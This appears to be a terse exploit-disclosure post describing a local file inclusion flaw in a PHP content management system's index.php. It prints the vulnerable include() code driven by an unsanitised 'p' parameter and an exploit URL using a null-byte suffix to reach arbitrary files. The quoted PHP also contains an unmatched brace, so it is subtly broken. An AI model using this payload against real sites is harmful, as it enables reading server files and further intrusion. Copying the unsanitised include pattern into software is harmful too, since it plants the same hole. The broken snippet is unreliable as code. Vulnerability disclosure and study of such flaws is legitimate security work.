SCMS version 1 suffers from a local file inclusion vulnerability in index.php.
22797a687e34c02addcdd44d9c23aa14c847129b70d080e419e550d11af57f1f
--:local file include:--
---------------------------------
script:simple content management system v 1
-------------------------------------------------------
download from:https://futurekast.com/fcms/php/SCMSv1.zip
-------------------------------------------------------
...............................................
vul:/index.php line 34:
<?php
if (!isset($_GET['p']))
include("../SCMSv1/includes/default.txt");
} else include("includes/" . $_GET['p'] . ".txt");
?>
-------------------------------------------
-------------------------------------------
xpl:
https://127.0.0.1/path/index.php?p=[Lfi]%00
***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]
from:[iran]
---------------------------------------------------